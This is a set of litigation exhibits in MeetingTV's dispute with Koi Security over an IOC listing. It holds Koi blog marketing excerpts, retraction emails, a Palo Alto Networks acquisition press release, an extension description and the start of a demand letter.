2) This is also the kind of gap Koi is built to catch. Our risk engine analyzes extension behavior in depth, network requests, file system access, code patterns, catching malicious intent regardless of whether a marketplace scanner ran. Book a demo to see how.
https://www.koi.ai/blog/open-sesame-how-a-fail-open-bug-in-open-vsxs-new-scanner-let-malware-walk-right-in

3) If you want to make sure a vulnerable version of this extension - or any other - isn't installed across your organization, that's exactly what we built Koi to do. We give security teams visibility into every browser extension in their environment, flagging overly permissive trust models, vulnerable dependencies, and the kind of trust boundary issues that made this attack possible.

Book a demo to see how Koi can protect your organization.
https://www.koi.ai/blog/shadowprompt-how-any-website-could-have-hijacked-anthropic-claude-chrome-extension

4) This is why we built Koi. Our platform discovers, assesses, and governs all software that flows into your environment - including browser extensions that traditional security tools miss entirely.

Trusted by Fortune 50 organizations and some of the largest tech companies in the world, Koi helps security teams gain visibility into the software their developers and employees actually use.

Book a demo to see how Koi can protect your organization from the threats hiding in browser extensions, npm packages, VS Code extensions, and the entire marketplace ecosystem.

Because when malware can hijack half a million users through extensions that look completely legitimate, you need tools that watch what software actually does - not just what it claims to be.
https://www.koi.ai/blog/vk-styles-500k-users-infected-by-chrome-extensions-that-hijack-vkontakte-accounts

5) Office add-ins are remote dynamic dependencies - their content can change at any time, making point-in-time audits insufficient. Koi continuously monitors and audits self-provisioned software across every marketplace - including browser extensions, IDE plugins, Office add-ins, and more - so that when an add-in turns malicious, you know about it before your users do. Book a demo to see how.
https://www.koi.ai/blog/agreetosteal-the-first-malicious-outlook-add-in-leads-to-4-000-stolen-credentials

This is exactly the kind of blind spot Koi is built to catch. Our platform continuously monitors software delivery pipelines - package managers, browser extensions, IDE extensions - flagging risky combinations like missing checksums and insecure transport before they become attack vectors. If your team had been running Koi, these 20 vulnerable casks would have been flagged the moment they appeared in your environment, and blocked before the payload ever touched the disk.

As software ecosystems grow more dynamic and decentralized, these overlooked trust gaps will only multiply. If you're relying on package managers to keep your endpoints clean, it's time to add deeper visibility into what's really flowing through your install commands.

Talk to us about how we can help secure your environment.
https://www.koi.ai/blog/brew-hijack-serving-malware

6) Koi gives security teams visibility and control over employee-installed software across marketplaces, including AI skills, browser extensions, developer plugins, and open source packages.
If you want to see how Koi would have caught this activity before execution, let's talk.
https://www.koi.ai/blog/clawhavoc-341-malicious-clawedbot-skills-found-by-the-bot-they-were-targeting

7) This research was conducted by the team at Koi. We built Koi to catch exactly these kinds of threats: attackers exploiting the gaps in package manager defenses that this post exposes. While npm's security mechanisms can be bypassed, our risk engine Wings watches what packages actually do during installation. Network requests, file system access, script execution, behavioral patterns that reveal malicious intent regardless of how the code got there.

Trusted by Fortune 50 organizations and some of the largest tech companies in the world, Koi helps security teams gain visibility and governance over the third-party code flowing into their environments.

Book a demo to see how our agentic AI risk engine catches threats that slip past traditional defenses.
https://www.koi.ai/blog/packagegate-6-zero-days-in-js-package-managers-but-npm-wont-act

8) But there's a gap between how quickly we adopt and how thoroughly we verify. 1.5 million developers trusted these extensions because they worked. The marketplace approved them. The reviews were positive. The functionality is real. So is the spyware.

Moving fast with AI tools is good. Moving fast without visibility into what they're actually doing with your code is how 1.5 million developers ended up with their workspaces harvested.

Your team shouldn't have to choose between moving fast and staying safe.
Koi lets you do both. We analyze what extensions actually do after installation - not just what they claim. Scan your environment to find threats already running. Block malicious extensions before they're installed. Adopt AI tools at full speed, with full visibility.

Book a demo to see how Koi protects your developers without slowing them down.
https://www.koi.ai/blog/maliciouscorgi-the-cute-looking-ai-extensions-leaking-code-from-1-5-million-developers

9) Koi makes the OWASP Agentic Top 10 actionable by tying those categories to real controls. You can inventory agentic components (including both binary and non-binary software), see what changed between versions, score risk per item, and enforce sourcing and install policies so a single compromised MCP, typosquat, or malicious update does not spread quietly across the fleet. Then, when you need to allow an exception, you can do it deliberately, scoped to the right users and devices, instead of relying on ad hoc installs.

If you want to map the OWASP Agentic Top 10 to your environment and see what you are exposed to today, you can book a demo and we will walk through your current agentic footprint and the specific policies that reduce risk without slowing teams down.
https://www.koi.ai/blog/owasp-agentic-ai-top-10-a-practical-security-guide

10) We built Koi to catch exactly these kinds of threats: attackers exploiting the gaps in extension marketplace defenses. While your IDE's recommendations might be compromised, our risk engine watches what extensions actually do during installation: network requests, file system access, script execution, behavioral patterns that reveal malicious intent regardless of how the code got there.

Trusted by Fortune 50 organizations and some of the largest tech companies in the world, Koi helps security teams gain visibility and governance over the third-party code flowing into their environments.

Book a demo to see how our agentic AI risk engine catches threats that slip past traditional defenses.
https://www.koi.ai/blog/how-we-prevented-cursor-windsurf-google-antigravity-from-recommending-malware

11) We identified DarkSpectre because we had the infrastructure IOCs to pivot from. We could follow the breadcrumbs from ShadyPanda to GhostPoster to The Zoom Stealer because they shared infrastructure.

DarkSpectre likely has more infrastructure in place right now - extensions that look completely legitimate because they are legitimate, for now. They're still in the trust-building phase, accumulating users, earning badges, waiting. Only time will tell what else they've been preparing while we were uncovering these three operations.

And DarkSpectre is just one group. How many other threat actors - Chinese, Russian, North Korean, or otherwise - are running similar long-term operations? In total, this group has almost 300+ extensions that we found across multiple campaigns. The total number of sleeper extensions across all threat actors is unknowable.

The marketplace model checks extensions once at upload. DarkSpectre updates whenever they want. That's why Koi built Wings - our risk engine that analyzes every version of every extension using static analysis, dynamic analysis, and agentic AI. That's how you catch sleeper threats that wait years to activate.

Book a demo to see how Koi's continuous monitoring catches what marketplaces miss.
https://www.koi.ai/blog/darkspectre-unmasking-the-threat-actor-behind-7-8-million-infected-browsers

12) GlassWorm is now a cross-platform threat.

These extensions were live for days. In that window, they accumulated 50,000 downloads while the VS Code Marketplace's automated scanning saw nothing wrong.

That's not a failure of the scanning - it's a limitation of the approach. When malware waits 15 minutes to execute, static analysis will always come up clean. When C2 infrastructure lives on an immutable blockchain, there's no domain to blacklist. When the attacker reads your research and ships new techniques within weeks, signature-based detection is always one step behind.

Four waves in two and a half months. Each one more capable than the last. The question isn't whether there will be a Wave 5 - it's whether you'll catch it before your developers install it.

This writeup was authored by the research team at Koi Security.

Our risk engine, Wings, flagged these extensions within hours of publication. When attackers evolve this fast, you need continuous behavioral analysis across your entire software supply chain.

Book a demo to see how Koi catches what satisfactory scanners miss.
https://www.koi.ai/blog/glassworm-goes-mac-fresh-infrastructure-new-tricks

13) This campaign has its rough edges - the attacker left comments in their code, used a memorable mutex name, and their C2 domain looks like someone mashed their keyboard. But the use of DLL hijacking with a legitimate signed binary shows real tradecraft. Sophistication is uneven, but the techniques that matter are solid.

A developer could install what looks like a harmless theme or a useful AI tool, and within seconds their WiFi passwords, clipboard contents, and browser sessions are being exfiltrated to a remote server. At the time of writing, Codo AI is still live on the VS Code marketplace. The attack surface for developer tools continues to expand, and attackers are paying attention.

This writeup was authored by the research team at Koi Security.

We built Koi to detect exactly these kinds of threats - malicious extensions that slip past marketplace reviews and compromise developer environments. Our risk engine continuously monitors software marketplaces to catch threats before they reach your team.

Book a demo to see how behavioral monitoring catches threats that static analysis misses.
https://www.koi.ai/blog/the-vs-code-malware-that-captures-your-screen

14) A year ago, Cyberhaven. Now Trust Wallet. Both on Christmas Eve. Both through the Chrome Web Store's official update mechanism. Both caught by the community within 24 hours - but not before real damage was done.

The pattern is clear, and so is the lesson: you don't need to catch every malicious update yourself. You just need to not be first in line.

Version update cooldowns are the simplest defense against supply chain attacks like this one. If your organization delays extension updates by 48-72 hours, you let the broader security community serve as an early warning system. By the time the update reaches your users, it's either been vetted or flagged.

The question isn't whether another Christmas Eve attack is coming. It's whether you'll be ready for it.

This writeup was authored by the research team at Koi.

If you want to learn more about how version update cooldowns and other policies can protect your organization from extension supply chain attacks, book a demo.
https://www.koi.ai/blog/trust-wallet-binance-compromised-inside-the-code-that-stole-7m-on-christmas-eve

15) We built Koi to detect exactly these kinds of threats - malicious extensions that slip past marketplace reviews and compromise user environments. Our risk engine flagged the anomalous behavior of GhostPoster's image-loading code before we ever extracted the hidden payload.

Book a demo to see how behavioral monitoring catches threats that static analysis misses.
https://www.koi.ai/blog/inside-ghostposter-how-a-png-icon-infected-50-000-firefox-browser-users

16) We built Koi to detect exactly these kinds of threats - extensions that slip past marketplace reviews and quietly exfiltrate sensitive data. Our risk engine, Wings, continuously monitors browser extensions to catch threats before they reach your team.

Book a demo to see how behavioral analysis catches what static review misses.
https://www.koi.ai/blog/urban-vpn-browser-extension-ai-conversations-data-collection

17) We built Koi to address exactly this kind of threat. Our risk engine doesn't just analyze what packages claim to be. It watches what they actually do, and it's trained to catch code that tries to manipulate the analysis itself. Network requests during installation. Anomalous behavior that static analysis can't catch. And now, attempts to gaslight AI-powered security tools.

Trusted by Fortune 50 organizations and some of the world's largest tech companies, Koi provides real-time risk scoring and governance across package ecosystems including npm, PyPI, VS Code extensions, Chrome extensions, and beyond.

Book a demo to see how our risk engine catches the attacks that slip past traditional security tools.
https://www.koi.ai/blog/two-years-17k-downloads-the-npm-malware-that-tried-to-gaslight-security-scanners

18) Need Help?
Concerned your organization may be affected? Reach out to us for expert guidance on detecting compromised packages and mitigating this supply-chain attack.
https://www.koi.ai/incident/live-updates-sha1-hulud-the-second-coming-hundred-npm-packages-compromised

19) At Koi, we built Wings for exactly this moment. Because we knew it was inevitable. The only question was how long it would take everyone else to realize it.

Welcome to the new reality of cybersecurity. Stay paranoid.

Want to see how Wings detects threats that traditional security tools miss? Get a demo of Koi's agentic risk engine.
https://www.koi.ai/blog/when-anthropic-claude-becomes-a-cyber-weapon-the-ai-arms-race-has-begun

20) We've built Koi to meet this moment. Our platform helps discover, assess, and govern everything your teams pull from marketplaces like the Chrome Web Store, VSCode, Hugging Face, Homebrew, GitHub, and beyond. Trusted by Fortune 50 organizations, BFSIs, and some of the largest tech companies in the world, Koi automates the security processes needed to gain visibility, establish governance, and proactively reduce risk across this sprawling attack surface.

Book a demo to see how Koi closes the gaps that legacy tools miss.

Stay paranoid out there. Because in a world where malware can be invisible and worms can propagate themselves, paranoia isn't a bug - it's a feature.
https://www.koi.ai/blog/glassworm-returns-new-wave-openvsx-malware-expose-attacker-infrastructure

21) If you'd like to chat, schedule a call with us here, we'd love to learn more about what brought you here and explore your cybersecurity thoughts and dreams, who knows, maybe we can make yours come true one day.
https://www.koi.ai/blog/4-6-introducing-extensiontotal-how-to-assess-risk-in-vs-code-extensions

22) Trusted by Fortune 100s, 500s, and defense tech enterprises, ExtensionTotal automates security processes, providing visibility, governance, and proactive risk to reduce and balance this attack surface.

If you'd like to chat, hit us up here 👍

— Amit Assaraf, CEO
https://www.koi.ai/blog/vscode-extension-trivia-real-or-cake

23) Trusted by Fortune 100s, 500s, and defense tech enterprises, ExtensionTotal automates security processes, providing visibility, governance, and proactive risk to reduce and balance this attack surface.

If you'd like to chat, hit us up here 👍
https://www.koi.ai/blog/when-chrome-extensions-turn-against-us-the-cyberhaven-breach-and-beyond

24) This is a classic problem with software supply chain that we meet every day in large enterprises, how do you balance security and productivity? We've built our product to do just that, for practitioners and enterprises alike.

If you'd like to chat, hit us up here
https://www.koi.ai/blog/a-wolf-in-dark-mode-the-malicious-vs-code-theme-that-fooled-millions

25) Trusted by Fortune 100s, 500s, and defense tech enterprises, ExtensionTotal automates security processes, providing visibility, governance, and proactive risk to reduce and balance this attack surface.

If you'd like to chat, hit us up here 👍
https://www.koi.ai/blog/a-month-of-malware-in-the-chrome-web-store

26) At ExtensionTotal, we help organizations navigate this evolving threat landscape by detecting malicious or risky extensions before they cause harm, allowing teams to continue leveraging the power and productivity of modern development tools without compromising on security.
https://www.koi.ai/blog/mining-in-plain-sight-the-vs-code-extension-cryptojacking-campaign

27) We've built Koi to meet this moment; for practitioners and enterprises alike. Our platform helps discover, assess, and govern everything your teams pull from marketplaces like the Chrome Web Store, VSCode, Hugging Face, Homebrew, GitHub, and beyond.

Trusted by Fortune 50 organizations, BFSIs and some of the largest tech companies in the world, Koi automates the security processes needed to gain visibility, establish governance, and proactively reduce risk across this sprawling attack surface.

If you're curious about our solution or ready to take action, book a demo or hit us up here 👍
https://www.koi.ai/blog/marketplace-takeover-how-we-couldve-taken-over-every-developer-using-a-vscode-fork-putting-millions-at-risk

28) At Koi, we help organizations discover, assess, and monitor everything their teams install from software marketplaces including AI-enabled tools like VS Code extensions. Because the reality is, most companies have no idea what software their developers are actually using, let alone whether it's been compromised.

This Amazon Q incident won't be the last supply chain attack we see on AI development tools. In fact, I guarantee it's just the beginning. The question is: will you be ready for the next one?

If you want to get serious about securing your development tool supply chain, reach out to us. We've been tracking these threats longer than anyone, and we've built the tools to help you stay ahead of them.
https://www.koi.ai/blog/amazons-ai-assistant-almost-nuked-a-million-developers-production-environments

29) SpyVPN shows how easy it is for malicious extensions to slip past marketplace security and compromise sensitive data. With Koi, security  teams gain visibility, risk scoring, and governance across binary & non-binary software — before it ever hits production.

Book a demo to see how Koi closes the gap that legacy tools miss.
https://www.koi.ai/blog/spyvpn-the-vpn-that-secretly-captures-your-screen

30) Koi was built to solve this problem. Our platform gives practitioners and enterprises the ability to uncover, evaluate, and control what their teams bring in from ecosystems like NPM, Chrome Web Store, VS Code, Hugging Face, Homebrew, and beyond. Today, some of the world's largest banks, Fortune 50 companies, and leading technology firms rely on Koi to automate the processes that bring visibility, establish governance, and proactively shrink this expanding attack surface.

If you want to see how it works — or if you're ready to take action — book a demo or reach out to us.
https://www.koi.ai/blog/npm-supply-chain-attack-package-poisoner

31) Koi was built to solve this problem. Our platform gives practitioners and enterprises the ability to uncover, evaluate, and control what their teams bring in from ecosystems like VS Code, NPM, Chrome Web Store, Hugging Face, Homebrew, and beyond. Today, some of the world's largest banks, Fortune 50 companies, and leading technology firms rely on Koi to automate the processes that bring visibility, establish governance, and proactively shrink this expanding attack surface.

If you want to see how it works — or if you're ready to take action — book a demo or reach out to us.
https://www.koi.ai/blog/whitecobra-vscode-cursor-extensions-malware

32) Need Help?
Concerned your organization may be affected? Reach out to us for expert guidance on detecting compromised packages and mitigating this supply-chain attack.
https://www.koi.ai/incident/shai-hulud-npm-supply-chain-attack-crowdstrike-tinycolor

33) At Koi, we're taking a different approach. Rather than waiting for each marketplace to develop their own security standards, we continuously scan all extension marketplaces to identify threats before they reach your development environment. Our comprehensive risk analysis evaluates extensions across multiple threat vectors - from code exfiltration and cryptocurrency mining to suspicious network behavior and obfuscated payloads.

When we detect malicious extensions in your environment, we don't just flag them. We offer automatic remediation, safely removing compromised tools and helping you assess potential damage. Our intelligence spans marketplace boundaries because threats don't respect platform divisions.

If you want to see how comprehensive marketplace security works - or if you're ready to protect your development environment - book a demo or reach out to us.
https://www.koi.ai/blog/tiger-jack-malicious-vscode-extensions-stealing-code

34) With Koi, security teams gain visibility, risk scoring, and governance across binary & non-binary software before it ever hits production.

Book a demo to see how Koi closes the gap that legacy tools miss.
https://www.koi.ai/blog/glassworm-first-self-propagating-worm-using-invisible-code-hits-openvsx-marketplace

35) We built Koi to address exactly this problem. Our risk engine doesn't just analyze what packages claim to be - it runs them and watches what they actually do. Network requests during installation. File system access patterns. Anomalous behavior that static analysis can't catch.

Trusted by Fortune 50 organizations and some of the world's largest tech companies, Koi provides real-time risk scoring and governance across package ecosystems including npm, PyPI, VS Code extensions, Chrome extensions, and beyond.

Book a demo to see how our risk engine catches the attacks that slip past traditional security tools.

Because when malware can hide in dependencies that don't show up in any security scan, you need tools that watch what packages do, not just what they say they are.
https://www.koi.ai/blog/phantomraven-npm-malware-hidden-in-invisible-dependencies

# EXHIBIT 18

## Commercial Speech Examples from Reports by Koi Security Inc CEO Amit Assaraf

"For too long, the use of untrusted third-party code, often running with the highest privileges has flown under the radar for both enterprises and attackers. That era is ending. The tide is shifting.

We've built Koi to meet this moment; for practitioners and enterprises alike. Our platform helps discover, assess, and govern everything your teams pull from marketplaces like the VSCode, OpenVSX, Chrome Web Store, Firefox, Hugging Face, Homebrew, GitHub, and beyond.

Trusted by Fortune 50 organizations, BFSIs and some of the largest tech companies in the world, Koi automates the security processes needed to gain visibility, establish governance, and proactively reduce risk across this sprawling attack surface.

If you're curious about our solution or ready to take action, book a demo or hit us up here 👍"

https://www.koi.ai/blog/when-both-marketplaces-fall-the-cross-platform-extension-malware-campaign
Report author: Amit Assaraf

---

"We see malware like this every day and help organizations mitigate it. You ask, how do you balance security and productivity? We've built ExtensionTotal to do just that for practitioners and enterprises alike. We help discover, assess, and govern everything your teams pull from marketplaces like Chrome Web Store, VSCode, Huggingface, Homebrew, GitHub, and beyond.

Trusted by Fortune 100s, 500s, and defense tech enterprises, ExtensionTotal automates security processes, providing visibility, governance, and proactive risk to reduce and balance this attack surface.

If you'd like to chat, hit us up here 👍"

https://www.koi.ai/blog/a-month-of-malware-in-the-chrome-web-store
Report author: Amit Assaraf

---

"This is a classic problem with software supply chain that we meet every day in large enterprises, how do you balance security and productivity? We've built ExtensionTotal to do just that, for practitioners and enterprises alike.

Trusted by Fortune 100s, 500s, and defense tech enterprises, ExtensionTotal automates security processes, providing visibility, governance, and proactive risk to reduce and balance this attack surface.

If you'd like to chat, hit us up here"

https://www.koi.ai/blog/when-chrome-extensions-turn-against-us-the-cyberhaven-breach-and-beyond
Report author: Amit Assaraf

# EXHIBIT 19

From: **Amit Assaraf** <amit@koi.ai>
Date: Thu, Feb 12, 2026 at 6:36 AM
Subject: Re: Fwd: Formal Demand for Retraction – Defamatory Publication Dated December 30, 2025
To: Michael Robertson <mr@michaelrobertson.com>
Cc: Idan Dardikman <idan@koi.ai>

Hey Michael,

We've check this internally, Idan our CTO is CC'd. First off, I'd like to notify you that the reference to your domain (which was the only reference to MeetingTV inside the blog) was removed from the IOCs list for good faith.

This domain in fact, was inside the code of the malware, potentially in order to monitor your domain, so there was no mistake made as to the IOCs of the malicious code. Fact is that we've never made any claims that your company is related to the malicious actors.

That said, as we understand your concerns, we've decided to remove it and update the blog with a short statement to clarify that to our knowledge there is no connection between MeetingTV and the malicious threat actors.

Feel free to use this updated statement as an official update to whomever you'd like to reference this to, available here:
https://www.koi.ai/blog/darkspectre-unmasking-the-threat-actor-behind-7-8-million-infected-browsers#heading-7

Sorry for the inconvenience this may have caused, but as mentioned, we've never claimed that there was any relation between the threat actor and your company.

Best,

---

**Amit Assaraf**
CEO • **Koi**
+972 50 596 4411 | +1 646 351 9882



Sent via Superhuman

On Thu, Feb 12, 2026 at 4:08 PM, Michael Robertson <mr@michaelrobertson.com> wrote:
Amit,

It's shockingly irresponsible nobody contacted us prior to publishing this damaging and false article. We have prominent contact info - which is the opposite of what bad players do. We don't play in the shadows. We're a law abiding US Corp.

We're now blocked all over the world with no chance to remedy it. Security companies have blackballed us. Customers can't reach us. Partners won't talk to us. All because of bogus allegations were working with Chinese criminals. So wrong. So damaging.

-- mr

# EXHIBIT 20

Case 3:26-cv-01705-AJB-MMP Document 23 Filed 05/13/26 PageID.950 Page 141 of 171

Deploy Bravely — Secure your AI transformation with Prisma AIRS

PRESS RELEASE

# Palo Alto Networks Completes Acquisition of Koi to Secure the Agentic Endpoint

Apr 14, 2026

*Closing the AI security gap as new frontier models and coding agents expand the enterprise attack surface*

SANTA CLARA, Calif., April 14, 2026 /PRNewswire/ –– Palo Alto Networks® (NASDAQ: PANW), the global cybersecurity leader, today announced the completion of its acquisition of Koi. With this acquisition, Palo Alto Networks defines a new category of protection: Agentic Endpoint Security (AES). Koi's unique solution to securing vibe coding agents and autonomous endpoint tools comes as the industry reaches an inflection point of agentic adoption.

The rapid adoption of tools like Claude Code and OpenClaw are driving incredible productivity gains, which will be critical to countering the security challenges posed by the latest AI models. But these agentic tools themselves have also greatly expanded the endpoint attack surface. By integrating Koi's technology with Prisma® AIRS™, Palo Alto Networks will extend visibility and security to agentic AI on the endpoint, offering a single control plane to secure enterprise-wide AI adoption with AES. In addition, this acquisition enables Palo Alto Networks to introduce a new module for Cortex XDR® to identify and remediate risks within the AI software ecosystem. Koi's capabilities will also remain available as a standalone offering, allowing every customer to benefit from industry leading agentic endpoint security capabilities alongside their existing EDR solutions.

**Lee Klarich, Chief Product & Technology Officer of Palo Alto Networks, said:**
"Agentic AI presents tremendous opportunity for the enterprise, yet they create a new attack surface that traditional security tools were not built to detect. These agents operate with access to critical systems and sensitive data, creating the ultimate insider threat. With the acquisition of Koi, we are delivering the only solution I've seen to secure vibe coding and agentic AI at the endpoint, so our customers don't have to choose between innovation and security."

**Amit Assaraf, CEO and Co-Founder of Koi, said:**

"By joining Palo Alto Networks, we will be able to provide our customers with the most comprehensive solution for securing all AI and software on the endpoint, and across the enterprise. Together, we are establishing Agentic Endpoint Security as the new imperative, giving our customers the secure foundation they need to lead in an AI-native world."

**Learn more** about how Palo Alto Networks will integrate Koi into its solutions.

Follow Palo Alto Networks on **X**, **LinkedIn**, **Facebook** and **Instagram**.

### About Palo Alto Networks

Palo Alto Networks (NASDAQ: PANW), the global AI cybersecurity leader, protects our digital way of life with a comprehensive portfolio of cybersecurity solutions and platforms across Network, Cloud, Security Operations, AI and Identity. Trusted by 70,000+ customers and powered by Unit 42 threat intelligence, our AI-driven platforms eliminate complexity, empowering enterprises to modernize with confidence and securing the speed of innovation. Explore the future of security at **www.paloaltonetworks.com**.

*Palo Alto Networks, Cortex, Cortex XDR, Prisma AIRS and the Palo Alto Networks logo are trademarks of Palo Alto Networks, Inc. in the United States and in jurisdictions throughout the world. All other trademarks, trade names, or service marks used or mentioned herein belong to their respective owners.*

### Forward-Looking Statements

*This press release contains forward-looking statements that involve risks, uncertainties, and assumptions, including, but not limited to, statements regarding the anticipated benefits and impact of the acquisition on Palo Alto Networks and its customers. There are a significant number of factors that could cause actual results to differ materially from statements made in this press release, including, but not limited to: risks related to disruption of management time from ongoing business operations due to the acquisition and the integration of Koi and other recently acquired companies; our ability to effectively operate Koi's operations and business, integrate Koi's business and products into our products, and realize the anticipated synergies in the transaction in a timely manner or at all; changes in the fair value of our contingent consideration liability associated with acquisitions; developments and changes in general market, political, economic and business conditions; failure of our platformization product offerings; risks associated with managing our growth; risks associated with new product, subscription and support offerings; shifts in priorities or delays in the development or release of new product or subscription or other offerings or the failure to timely develop and achieve market acceptance of new products and subscriptions, as well as existing products, subscriptions and support offerings; failure of our product offerings or business strategies in general; defects, errors, or vulnerabilities in our products, subscriptions or support offerings; our customers' purchasing decisions and the length of sales cycles; our ability to attract and retain new customers; developments and changes in general market, political, economic, and business conditions; our competition, including increased competition from entry into new product categories; our ability to acquire and integrate other companies, products, or technologies in a successful and timely manner; our share repurchase program, which may not be fully consummated or enhance shareholder value, and any share repurchases which could affect the price of our common stock; and our debt repayment obligations.*

Case 3:26-cv-01705-AJB-MMP   Document 23   Filed 05/13/26   PageID.952   Page 143 of 171

*Additional risks and uncertainties that could affect our financial results are included under the captions "Risk Factors" and "Management's Discussion and Analysis of Financial Condition and Results of Operations" in our Quarterly Report on Form 10-Q filed with the SEC on February 18, 2026, which is available on our website at investors.paloaltonetworks.com and on the SEC's website at **www.sec.gov**. Additional information, risks and uncertainties will also be set forth in other filings that we make with the SEC from time to time. All forward-looking statements in this press release are based on information available to us as of the date hereof, and we do not assume any obligation to update the forward-looking statements provided to reflect events that occur or circumstances that exist after the date on which they were made.*

**Palo Alto Networks logo (PRNewsFoto/Palo Alto Networks, Inc.) (PRNewsfoto/Palo Alto Networks, Inc.)**

SOURCE Palo Alto Networks, Inc.

**Share page on facebook**      **Share page on linkedin**      **Share page by an email**

# Get the latest news, invites to events, and threat alerts

Enter your email now to subscribe!

By submitting this form, I understand my personal data will be processed in accordance with **Palo Alto Networks Privacy Statement** and **Terms of Use.**

**Sign up**

143

# EXHIBIT 21

# Chrome Web Store Developer Dashboard

## Chrome Audio Capture

ID: kfokdmfpdnokpmpbjhjbcabgligoelgp

Installs & uninstalls

Impressions

Users

Ratings

User support

Chrome Audio Capture is a Chrome extension that allows users to record any audio playing on the current tab. Multiple tabs can be recorded simultaneously. Recordings can be saved as either .mp3 or .wav files. Users will have the option to mute tabs that are currently being recorded.

To begin recording on a tab simply click on the extension icon and use the interface or hotkeys to start and stop the recording. Once the recording is stopped or when the time limit is reached, a new tab will be opened for you to save and name your audio file. Make sure to save your file before closing the tab, otherwise the file will be lost! Check the options page for different output file formats and other features!

If you enjoyed the extension, please leave a review on the extension page! Please report any bugs or suggestions using the support tab of the extension page.

Note: Currently recordings are limited to 60 minutes due to Chrome memory constraints but you can safely bump it to 1.5 or 2 hours. Beyond that it will run out of memory in Chrome and stop abruptly. Sorry, this is a Chrome limitation.

BONUS: Webinar audio and video are now one click easy to record! When viewing certain webinar pages a RECORD button may be available making it a snap to record the webinar and have the video sent to you afterwards. Never miss another webinar or meeting. For cloud recording (which does not use your computer) a subscription service from Zoomcorder is required. Local recording is always free. Also webinar recommendations may appear on certain video meeting pages for high quality webinars from Meeting TV.

Version History:
version 2.26 Bugfixes

# EXHIBIT 22

Russian, North Korean, or otherwise - are running similar long-term operations? In total, this group has almost 300+ extensions that we found across multiple campaigns. The total number of sleeper extensions across all threat actors is unknowable.

The marketplace model checks extensions once at upload. DarkSpectre updates whenever they want. That's why Koi built Wings - our risk engine that analyzes every version of every extension using static analysis, dynamic analysis, and agentic AI. That's how you catch sleeper threats that wait years to activate.

**Book a demo** to see how Koi's continuous monitoring catches what marketplaces miss.

Intro

The Discovery Chain: How We Connected Three Campaigns to One Actor

DarkSpectre's Arsenal: Multiple Playbooks, One Actor

Campaign Deep-Dive: The Zoom Stealer

Campaign Deep-Dive: ShadyPanda

Attribution: The Chinese Connection

Final Thoughts    →

IOCs

SHARE

# IOCS

**Update (February 12, 2026):**

After publication, we conducted additional validation regarding the domain meetingtv[.]us, which was originally included in the IOC list. While the domain appeared in code analyzed during our investigation, we have determined that there is no evidence that this domain is connected or related in any way to the malicious infrastructure or the threat actor group described in this report.

**New Domains - Shady Panda**

- infinitynewtab[.]com

# EXHIBIT 23

From: **Michael Robertson** <mr@michaelrobertson.com>
Date: Wed, Feb 18, 2026 at 3:47 AM
Subject: Re: Fwd: Formal Demand for Retraction – Defamatory Publication Dated December 30, 2025
To: Amit Assaraf <amit@koi.ai>
Cc: Idan Dardikman <idan@koi.ai>

Amit,

What is the ID of the extensions you referenced in your report which extension communicated with infinitynewtab.com?

-- mr

WebinarTV.us - World's Best Webinars

On Thu, Feb 12, 2026, 6:36 AM Amit Assaraf <amit@koi.ai> wrote:
Hey Michael,

We've check this internally, Idan our CTO is CC'd. First off, I'd like to notify you that the reference to your domain (which was the only reference to MeetingTV inside the blog) was removed from the IOCs list for good faith.

This domain in fact, was inside the code of the malware, potentially in order to monitor your domain, so there was no mistake made as to the IOCs of the malicious code. Fact is that we've never made any claims that your company is related to the malicious actors.

That said, as we understand your concerns, we've decided to remove it and update the blog with a short statement to clarify that to our knowledge there is no connection between MeetingTV and the malicious threat actors.

Feel free to use this updated statement as an official update to whomever you'd like to reference this to, available here:
https://www.koi.ai/blog/darkspectre-unmasking-the-threat-actor-behind-7-8-million-infected-browsers#heading-7

Sorry for the inconvenience this may have caused, but as mentioned, we've never claimed that there was any relation between the threat actor and your company.

Best,

---
**Amit Assaraf**

CEO • **Koi**
+972 50 596 4411 | +1 646 351 9882

# EXHIBIT 24

 Gmail

Michael Robertson <mr@michaelrobertson.com>

## A Critical Cybersecurity Issue

1 message

**Michael Robertson** <mr@michaelrobertson.com>                    Tue, Apr 28, 2026 at 10:11 AM
To: a@paloaltonetworks.com
Bcc: narora@paloaltonetworks.com

Nikesh,

As you know, the cybersecurity industry is not regulated by the government. This puts the onus on market participants, especially the leaders, to operate with foresight since they wield the power to destroy companies and lives. One shortcoming of the industry is that it currently assumes cybersecurity companies operates perfectly.That's unrealistic. Mistakes are going to be made. Honest operators are going to be falsely labelled as bad actors.

This is what happened with Koi.ai, which your company bought. They published a report calling my company MeetingTV a criminal and putting multiple of our domains and software on the IOC digital global blacklist. Their publication claimed a single software program called Twitter X Video Downloader linked MeetingTV to Chinese criminals. The problem with that claim is that the software doesn't exist. Either it was hallucinated by AI or a human fabricated it. I can't think of another explanation.

Regardless of its origin, there is no such software. They alleged it connected to a dirty domain called infinitynewtab. Obviously, it doesn't since the software doesn't exist. If a human had verified this, they would have discovered the error, but they did not. Instead, they published it to the world, resulting in our corp name domain, obscure subdomains on Google cloud we used, and software programs being blocked globally. This includes by Palo Alto Networks.

Now your company owns Koi and is continuing to publish and rely on the false report. Our domain and Google subdomains are blocked and labeled as malware and command and control by your company and others around the world. (Koi has deleted some of their mentions.)

I'm asking you to take action on our issue. A company has been falsely accused and destroyed. Take down the false report which is defaming us and in its place put a full retraction. Remove our domains from your own blacklist and help get them removed from others who are blocking us because of the Koi report.

The industry needs to create policies and procedures which incorporate the reality that mistakes will be made. One idea I have is to reform the IOC process. It is unjust for security companies to put a company on that list without due process. Due process is a cornerstone of fairness. Without due process, it becomes vigilantism - too easy to falsely accuse someone. (Watch the movie, "Hang 'em High".)

The IOC process should be improved to include these steps:
- The accused seeing the evidence supporting the accusations in advance
- The accused being able to present evidence to defend themselves
- If there is a dispute, a neutral arbiter decides

None of that happens with the IOC today. Nobody contacted MeetingTV before publishing the devastating report. That's wrong. I'm asking you to correct it and lead the cybersecurity industry to a better place so this doesn't happen to anyone else.

-- MR

Note: No one from my legal team has asked or instructed me to reach out. This is of my own volition. My experience is that attorneys are paid to fight, so their financial incentive is not to settle. Resolution comes from the company principals communicating.

# EXHIBIT 25

Bradley K. Moores
Attorney at Law
6811 Alvarado Rd. 20
San Diego, CA 92120
Tel: (619) 742.8612
Email: brad@bradleymoores.com

VIA E-MAIL ONLY

April 15, 2026

Bruce Byrd
bbyrd@paloaltonetworks.com
General Counsel
Palo Alto Networks, Inc.

**MeetingTV Inc. v. Koi Security Inc., et al. (United States District Court, Southern District of California Case No. 26cv1705)**

**Notice of Successor Liability, Ongoing Publication, and Demand for Immediate Remediation**

Dear General Counsel:

